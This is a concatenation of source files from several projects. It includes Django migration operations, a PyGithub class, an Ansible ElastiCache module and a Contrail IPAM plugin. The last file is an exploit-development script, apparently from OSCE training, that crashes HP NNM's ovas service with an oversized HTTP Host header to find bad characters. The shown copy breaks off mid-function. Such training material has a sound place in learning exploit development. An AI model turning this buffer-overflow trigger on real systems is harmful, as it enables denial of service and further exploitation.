html_template = "test.%s.html.template" % target
# Create list of excluded tests.
exclusion_dict = {}
for excluded_pattern in spec_json['excluded_tests']:
excluded_expansion = \
expand_test_expansion_pattern(excluded_pattern,
test_expansion_schema)
for excluded_selection in permute_expansion(excluded_expansion):
excluded_selection_path = selection_pattern % excluded_selection
exclusion_dict[excluded_selection_path] = True
for spec in specification:
for spec_test_expansion in spec['test_expansion']:
expansion = expand_test_expansion_pattern(spec_test_expansion,
test_expansion_schema)
for selection in permute_expansion(expansion):
selection_path = selection_pattern % selection
if not selection_path in exclusion_dict:
subresource_path = \
spec_json["subresource_path"][selection["subresource"]]
generate_selection(selection,
spec,
subresource_path,
html_template)
else:
print 'Excluding selection:', selection_path
def main(target):
spec_json = load_spec_json();
spec_validator.assert_valid_spec_json(spec_json)
generate_test_source_files(spec_json, target)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Test suite generator utility')
parser.add_argument('-t', '--target', type = str,
choices = ("release", "debug"), default = "release",
help = 'Sets the appropriate template for generating tests')
# TODO(kristijanburnik): Add option for the spec_json file.
args = parser.parse_args()
main(args.target)
|
mpl-2.0
|
JioCloud/contrail-neutron-plugin
|
neutron_plugin_contrail/plugins/opencontrail/contrail_plugin_ipam.py
|
10
|
3050
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2014 Juniper Networks. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Hampapur Ajay, Praneet Bachheti
import copy
import logging
from pprint import pformat
import sys
import cgitb
LOG = logging.getLogger(__name__)
class NeutronPluginContrailIpam(object):
def set_core(self, core_instance):
self._core = core_instance
def _make_ipam_dict(self, entry, status_code=None, fields=None):
return entry
def create_ipam(self, context, ipam):
"""
Creates a new ipam, and assigns it a symbolic name.
"""
plugin_ipam = copy.deepcopy(ipam)
ipam_dicts = self._core._create_resource('ipam', context, plugin_ipam)
LOG.debug("create_ipam(): " + pformat(ipam_dicts) + "\n")
return ipam_dicts
def get_ipam(self, context, ipam_id, fields=None):
"""
Get the attributes of a ipam.
"""
ipam_dicts = self._core._get_resource('ipam', context, ipam_id, fields)
LOG.debug("get_ipam(): " + pformat(ipam_dicts))
return ipam_dicts
def update_ipam(self, context, ipam_id, ipam):
"""
Updates the attributes of a particular ipam.
"""
plugin_ipam = copy.deepcopy(ipam)
ipam_dicts = self._core._update_resource('ipam', context, ipam_id,
plugin_ipam)
LOG.debug("update_ipam(): " + pformat(ipam_dicts))
return ipam_dicts
def delete_ipam(self, context, ipam_id):
"""
Deletes the ipam with the specified identifier.
"""
self._core._delete_resource('ipam', context, ipam_id)
LOG.debug("delete_ipam(): %s" % (ipam_id))
def get_ipams(self, context, filters=None, fields=None):
"""
Retrieves all ipams identifiers.
"""
ipam_dicts = self._core._list_resource('ipam', context, filters,
fields)
LOG.debug(
"get_ipams(): filters: " + pformat(filters) + " data: "
+ pformat(ipam_dicts))
return ipam_dicts
def get_ipams_count(self, context, filters=None):
"""
Get the count of ipams.
"""
ipams_count = self._core._count_resource('ipam', context, filters)
LOG.debug("get_ipams_count(): filters: " + pformat(filters) +
" data: " + str(ipams_count['count']))
return ipams_count['count']
|
apache-2.0
|
thawatchai/mrkimontour
|
appengine-django/lib/django/db/migrations/operations/models.py
|
290
|
21735
|
from __future__ import unicode_literals
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.db.models.options import normalize_together
from django.utils import six
from django.utils.functional import cached_property
class CreateModel(Operation):
"""
Create a model's table.
"""
serialization_expand_args = ['fields', 'options', 'managers']
def __init__(self, name, fields, options=None, bases=None, managers=None):
self.name = name
self.fields = fields
self.options = options or {}
self.bases = bases or (models.Model,)
self.managers = managers or []
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'fields': self.fields,
}
if self.options:
kwargs['options'] = self.options
if self.bases and self.bases != (models.Model,):
kwargs['bases'] = self.bases
if self.managers and self.managers != [('objects', models.Manager())]:
kwargs['managers'] = self.managers
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.add_model(ModelState(
app_label,
self.name,
list(self.fields),
dict(self.options),
tuple(self.bases),
list(self.managers),
))
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def describe(self):
return "Create %smodel %s" % ("proxy " if self.options.get("proxy", False) else "", self.name)
def references_model(self, name, app_label=None):
strings_to_check = [self.name]
# Check we didn't inherit from the model
for base in self.bases:
if isinstance(base, six.string_types):
strings_to_check.append(base.split(".")[-1])
# Check we have no FKs/M2Ms with it
for fname, field in self.fields:
if field.remote_field:
if isinstance(field.remote_field.model, six.string_types):
strings_to_check.append(field.remote_field.model.split(".")[-1])
# Now go over all the strings and compare them
for string in strings_to_check:
if string.lower() == name.lower():
return True
return False
class DeleteModel(Operation):
"""
Drops a model's table.
"""
def __init__(self, name):
self.name = name
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.remove_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Delete model %s" % (self.name, )
class RenameModel(Operation):
"""
Renames a model.
"""
def __init__(self, old_name, new_name):
self.old_name = old_name
self.new_name = new_name
@cached_property
def old_name_lower(self):
return self.old_name.lower()
@cached_property
def new_name_lower(self):
return self.new_name.lower()
def deconstruct(self):
kwargs = {
'old_name': self.old_name,
'new_name': self.new_name,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
apps = state.apps
model = apps.get_model(app_label, self.old_name)
model._meta.apps = apps
# Get all of the related objects we need to repoint
all_related_objects = (
f for f in model._meta.get_fields(include_hidden=True)
if f.auto_created and not f.concrete and (not f.hidden or f.many_to_many)
)
# Rename the model
state.models[app_label, self.new_name_lower] = state.models[app_label, self.old_name_lower]
state.models[app_label, self.new_name_lower].name = self.new_name
state.remove_model(app_label, self.old_name_lower)
# Repoint the FKs and M2Ms pointing to us
for related_object in all_related_objects:
if related_object.model is not model:
# The model being renamed does not participate in this relation
# directly. Rather, a superclass does.
continue
# Use the new related key for self referential related objects.
if related_object.related_model == model:
related_key = (app_label, self.new_name_lower)
else:
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
new_fields = []
for name, field in state.models[related_key].fields:
if name == related_object.field.name:
field = field.clone()
field.remote_field.model = "%s.%s" % (app_label, self.new_name)
new_fields.append((name, field))
state.models[related_key].fields = new_fields
state.reload_model(*related_key)
state.reload_model(app_label, self.new_name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.new_name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.old_name)
# Move the main table
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Alter the fields pointing to us
for related_object in old_model._meta.related_objects:
if related_object.related_model == old_model:
model = new_model
related_key = (app_label, self.new_name_lower)
else:
model = related_object.related_model
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
to_field = to_state.apps.get_model(
*related_key
)._meta.get_field(related_object.field.name)
schema_editor.alter_field(
model,
related_object.field,
to_field,
)
# Rename M2M fields whose name is based on this model's name.
fields = zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many)
for (old_field, new_field) in fields:
# Skip self-referential fields as these are renamed above.
if new_field.model == new_field.related_model or not new_field.remote_field.through._meta.auto_created:
continue
# Rename the M2M table that's based on this model's name.
old_m2m_model = old_field.remote_field.through
new_m2m_model = new_field.remote_field.through
schema_editor.alter_db_table(
new_m2m_model,
old_m2m_model._meta.db_table,
new_m2m_model._meta.db_table,
)
# Rename the column in the M2M table that's based on this
# model's name.
schema_editor.alter_field(
new_m2m_model,
old_m2m_model._meta.get_field(old_model._meta.model_name),
new_m2m_model._meta.get_field(new_model._meta.model_name),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
self.new_name, self.old_name = self.old_name, self.new_name
self.database_forwards(app_label, schema_editor, from_state, to_state)
self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
self.new_name, self.old_name = self.old_name, self.new_name
def references_model(self, name, app_label=None):
return (
name.lower() == self.old_name_lower or
name.lower() == self.new_name_lower
)
def describe(self):
return "Rename model %s to %s" % (self.old_name, self.new_name)
class AlterModelTable(Operation):
"""
Renames a model's table
"""
def __init__(self, name, table):
self.name = name
self.table = table
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'table': self.table,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.models[app_label, self.name_lower].options["db_table"] = self.table
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Rename M2M fields whose name is based on this model's db_table
for (old_field, new_field) in zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many):
if new_field.remote_field.through._meta.auto_created:
schema_editor.alter_db_table(
new_field.remote_field.through,
old_field.remote_field.through._meta.db_table,
new_field.remote_field.through._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Rename table for %s to %s" % (self.name, self.table)
class AlterUniqueTogether(Operation):
"""
Changes the value of unique_together to the target one.
Input value of unique_together must be a set of tuples.
"""
option_name = "unique_together"
def __init__(self, name, unique_together):
self.name = name
unique_together = normalize_together(unique_together)
self.unique_together = set(tuple(cons) for cons in unique_together)
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'unique_together': self.unique_together,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options[self.option_name] = self.unique_together
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_unique_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
not self.unique_together or
any((name in together) for together in self.unique_together)
)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.unique_together or ''))
class AlterIndexTogether(Operation):
"""
Changes the value of index_together to the target one.
Input value of index_together must be a set of tuples.
"""
option_name = "index_together"
def __init__(self, name, index_together):
self.name = name
index_together = normalize_together(index_together)
self.index_together = set(tuple(cons) for cons in index_together)
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'index_together': self.index_together,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options[self.option_name] = self.index_together
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_index_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
not self.index_together or
any((name in together) for together in self.index_together)
)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.index_together or ''))
class AlterOrderWithRespectTo(Operation):
"""
Represents a change with the order_with_respect_to option.
"""
def __init__(self, name, order_with_respect_to):
self.name = name
self.order_with_respect_to = order_with_respect_to
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'order_with_respect_to': self.order_with_respect_to,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options['order_with_respect_to'] = self.order_with_respect_to
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
to_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, to_model):
from_model = from_state.apps.get_model(app_label, self.name)
# Remove a field if we need to
if from_model._meta.order_with_respect_to and not to_model._meta.order_with_respect_to:
schema_editor.remove_field(from_model, from_model._meta.get_field("_order"))
# Add a field if we need to (altering the column is untouched as
# it's likely a rename)
elif to_model._meta.order_with_respect_to and not from_model._meta.order_with_respect_to:
field = to_model._meta.get_field("_order")
if not field.has_default():
field.default = 0
schema_editor.add_field(
from_model,
field,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
self.order_with_respect_to is None or
name == self.order_with_respect_to
)
)
def describe(self):
return "Set order_with_respect_to on %s to %s" % (self.name, self.order_with_respect_to)
class AlterModelOptions(Operation):
"""
Sets new model options that don't directly affect the database schema
(like verbose_name, permissions, ordering). Python code in migrations
may still need them.
"""
# Model options we want to compare and preserve in an AlterModelOptions op
ALTER_OPTION_KEYS = [
"get_latest_by",
"managed",
"ordering",
"permissions",
"default_permissions",
"select_on_save",
"verbose_name",
"verbose_name_plural",
]
def __init__(self, name, options):
self.name = name
self.options = options
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'options': self.options,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options = dict(model_state.options)
model_state.options.update(self.options)
for key in self.ALTER_OPTION_KEYS:
if key not in self.options and key in model_state.options:
del model_state.options[key]
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Change Meta options on %s" % (self.name, )
class AlterModelManagers(Operation):
"""
Alters the model's managers
"""
serialization_expand_args = ['managers']
def __init__(self, name, managers):
self.name = name
self.managers = managers
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
return (
self.__class__.__name__,
[self.name, self.managers],
{}
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.managers = list(self.managers)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Change managers on %s" % (self.name, )
|
gpl-2.0
|
CristianBB/SickRage
|
lib/github/GitCommit.py
|
74
|
5226
|
# -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <[email protected]> #
# Copyright 2012 Zearin <[email protected]> #
# Copyright 2013 AKFish <[email protected]> #
# Copyright 2013 Vincent Jacques <[email protected]> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.GitAuthor
import github.GitTree
class GitCommit(github.GithubObject.CompletableGithubObject):
"""
This class represents GitCommits as returned for example by http://developer.github.com/v3/todo
"""
@property
def author(self):
"""
:type: :class:`github.GitAuthor.GitAuthor`
"""
self._completeIfNotSet(self._author)
return self._author.value
@property
def committer(self):
"""
:type: :class:`github.GitAuthor.GitAuthor`
"""
self._completeIfNotSet(self._committer)
return self._committer.value
@property
def html_url(self):
"""
:type: string
"""
self._completeIfNotSet(self._html_url)
return self._html_url.value
@property
def message(self):
"""
:type: string
"""
self._completeIfNotSet(self._message)
return self._message.value
@property
def parents(self):
"""
:type: list of :class:`github.GitCommit.GitCommit`
"""
self._completeIfNotSet(self._parents)
return self._parents.value
@property
def sha(self):
"""
:type: string
"""
self._completeIfNotSet(self._sha)
return self._sha.value
@property
def tree(self):
"""
:type: :class:`github.GitTree.GitTree`
"""
self._completeIfNotSet(self._tree)
return self._tree.value
@property
def url(self):
"""
:type: string
"""
self._completeIfNotSet(self._url)
return self._url.value
@property
def _identity(self):
return self.sha
def _initAttributes(self):
self._author = github.GithubObject.NotSet
self._committer = github.GithubObject.NotSet
self._html_url = github.GithubObject.NotSet
self._message = github.GithubObject.NotSet
self._parents = github.GithubObject.NotSet
self._sha = github.GithubObject.NotSet
self._tree = github.GithubObject.NotSet
self._url = github.GithubObject.NotSet
def _useAttributes(self, attributes):
if "author" in attributes: # pragma no branch
self._author = self._makeClassAttribute(github.GitAuthor.GitAuthor, attributes["author"])
if "committer" in attributes: # pragma no branch
self._committer = self._makeClassAttribute(github.GitAuthor.GitAuthor, attributes["committer"])
if "html_url" in attributes: # pragma no branch
self._html_url = self._makeStringAttribute(attributes["html_url"])
if "message" in attributes: # pragma no branch
self._message = self._makeStringAttribute(attributes["message"])
if "parents" in attributes: # pragma no branch
self._parents = self._makeListOfClassesAttribute(GitCommit, attributes["parents"])
if "sha" in attributes: # pragma no branch
self._sha = self._makeStringAttribute(attributes["sha"])
if "tree" in attributes: # pragma no branch
self._tree = self._makeClassAttribute(github.GitTree.GitTree, attributes["tree"])
if "url" in attributes: # pragma no branch
self._url = self._makeStringAttribute(attributes["url"])
|
gpl-3.0
|
omriiluz/ansible-modules-core
|
cloud/amazon/elasticache_subnet_group.py
|
107
|
5473
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: elasticache_subnet_group
version_added: "2.0"
short_description: manage Elasticache subnet groups
description:
- Creates, modifies, and deletes Elasticache subnet groups. This module has a dependency on python-boto >= 2.5.
options:
state:
description:
- Specifies whether the subnet should be present or absent.
required: true
default: present
choices: [ 'present' , 'absent' ]
name:
description:
- Database subnet group identifier.
required: true
description:
description:
- Elasticache subnet group description. Only set when a new group is added.
required: false
default: null
subnets:
description:
- List of subnet IDs that make up the Elasticache subnet group.
required: false
default: null
region:
description:
- The AWS region to use. If not specified then the value of the AWS_REGION or EC2_REGION environment variable, if any, is used.
required: true
aliases: ['aws_region', 'ec2_region']
author: "Tim Mahoney (@timmahoney)"
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Add or change a subnet group
- elasticache_subnet_group
state: present
name: norwegian-blue
description: My Fancy Ex Parrot Subnet Group
subnets:
- subnet-aaaaaaaa
- subnet-bbbbbbbb
# Remove a subnet group
- elasticache_subnet_group:
state: absent
name: norwegian-blue
'''
try:
import boto
from boto.elasticache.layer1 import ElastiCacheConnection
from boto.regioninfo import RegionInfo
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state = dict(required=True, choices=['present', 'absent']),
name = dict(required=True),
description = dict(required=False),
subnets = dict(required=False, type='list'),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
group_name = module.params.get('name').lower()
group_description = module.params.get('description')
group_subnets = module.params.get('subnets') or {}
if state == 'present':
for required in ['name', 'description', 'subnets']:
if not module.params.get(required):
module.fail_json(msg = str("Parameter %s required for state='present'" % required))
else:
for not_allowed in ['description', 'subnets']:
if module.params.get(not_allowed):
module.fail_json(msg = str("Parameter %s not allowed for state='absent'" % not_allowed))
# Retrieve any AWS settings from the environment.
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
if not region:
module.fail_json(msg = str("Either region or AWS_REGION or EC2_REGION environment variable or boto config aws_region or ec2_region must be set."))
"""Get an elasticache connection"""
try:
endpoint = "elasticache.%s.amazonaws.com" % region
connect_region = RegionInfo(name=region, endpoint=endpoint)
conn = ElastiCacheConnection(region=connect_region, **aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=e.message)
try:
changed = False
exists = False
try:
matching_groups = conn.describe_cache_subnet_groups(group_name, max_records=100)
exists = len(matching_groups) > 0
except BotoServerError, e:
if e.error_code != 'CacheSubnetGroupNotFoundFault':
module.fail_json(msg = e.error_message)
if state == 'absent':
if exists:
conn.delete_cache_subnet_group(group_name)
changed = True
else:
if not exists:
new_group = conn.create_cache_subnet_group(group_name, cache_subnet_group_description=group_description, subnet_ids=group_subnets)
changed = True
else:
changed_group = conn.modify_cache_subnet_group(group_name, cache_subnet_group_description=group_description, subnet_ids=group_subnets)
changed = True
except BotoServerError, e:
if e.error_message != 'No modifications were requested.':
module.fail_json(msg = e.error_message)
else:
changed = False
module.exit_json(changed=changed)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
|
gpl-3.0
|
greyshell/Exploit-Dev
|
badchar_detection_automated/badchar_detection_HPNNM_B.07.53.py
|
1
|
10148
|
#!/usr/bin/env python2
# reference: CTP/OSCE
# author: greyshell
# description: identify good and bad chars in HPNNM-B.07.53
# dependency: python version: 2.7.x, pyenv-win==1.2.2, pywin32==218, WMI==1.4.9, pydbg
# 1) download the `dependency.zip` file.
# 2) extract the `pydbg.zip` inside your python `lib\site-packages` directory.
# 3) install `pywin32-218.win32-py2.7.exe` and `WMI-1.4.9.win32.exe`.
import os
import socket
import subprocess
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# global variables
all_chars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
request_template = (
"GET /topology/homeBaseView HTTP/1.1\r\n"
"Host: {}\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
"Content-Length: 1048580\r\n\r\n"
)
# current char that is being checked
cur_char = ""
bad_chars = []
good_chars = []
evil_str_sent = False
service_is_running = False
def chars_to_str(chars):
# convert a list of chars to a string
result = ""
for char in chars:
result += "\\x{:02x}".format(ord(char))
return result
def crash_service():
# send malformed data to ovas service in order to crash it. function runs in an independent thread
global evil_str_sent, cur_char, bad_chars, good_chars, all_chars
global service_is_running
char_counter = -1
timer = 0
while True:
# don't send evil string if process is not running
if not service_is_running:
time.sleep(1)
continue
# if main loop reset the evil_str_sent flag to False, sent evil_str again
if not evil_str_sent:
timer = 0
char_counter += 1
if char_counter > len(all_chars) - 1:
print("[+] bad chars: {}.".format(chars_to_str(bad_chars)))
print("[+] good chars: {}.".format(chars_to_str(good_chars)))
print("[+] done.")
# hack to exit application from non-main thread
os._exit(0)
cur_char = all_chars[char_counter]
# during crash [ESP + 4C] points to ("A" * 1025)th position
crash = "A" * 1025 + cur_char * 4 + "B" * 2551
evil_str = request_template.format(crash)
print("[+] sending evil HTTP request...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
sock.send(evil_str)
sock.close()
except Exception as e:
print("[+] error sending malicious buffer, service may be down.")
print("[+] restarting the service and retrying...")
print(e)
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
finally:
evil_str_sent = True
else:
if timer > 10:
print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
print("[+] marking last char as bad and killing the service...")
bad_chars.append(cur_char)
print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
with open("bad_chars.txt", 'w') as f:
f.write(chars_to_str(bad_chars))
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
time.sleep(1)
timer += 1
return
def is_service_started():
# check if service was successfully started
print("[+] making sure the service was restarted...")
service_check_counter = 0
while not service_is_running:
if service_check_counter > 4: # give it 5 attempts
return False
for process in wmi.WMI().Win32_Process():
if process.Name == 'ovas.exe':
return process.ProcessId
service_check_counter += 1
time.sleep(1)
def is_service_responsive():
# check if service responds to HTTP requests
print("[+] making sure the service responds to HTTP requests...")
service_check_counter = 0
while not service_is_running:
# give it 5 attempts
if service_check_counter > 4:
return False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
test_str = request_template.format("127.0.0.1")
sock.send(test_str)
# give response 1 second to arrive
sock.settimeout(1.0)
resp = sock.recv(1024)
if resp:
return True
sock.close()
except Exception as e:
print(e)
service_check_counter += 1
def restart_service():
# restart ovas.exe service and return its PID
global service_is_running
service_is_running = False
# check that the service is running before stopping it
for process in wmi.WMI().Win32_Process():
if process.Name == 'ovas.exe':
print("[+] stopping the service...")
# forcefully terminate the process
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
print("[+] starting the service...")
# start the process with reliability
subprocess.Popen('ovstop -c ovas').communicate()
subprocess.Popen('ovstart -c ovas').communicate()
pid = is_service_started()
if pid:
print("[+] the service was restarted.")
else:
print("[-] service was not found in process list. Restarting...")
return restart_service()
if is_service_responsive():
print("[+] service responds to HTTP requests. Green ligth.")
service_is_running = True
return pid
else:
print("[-] service does not respond to HTTP requests. Restarting...")
return restart_service()
def check_char(raw_data):
# compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
global bad_chars, good_chars
hex_data = dbg.hex_dump(raw_data)
print("[+] buffer: {}".format(hex_data))
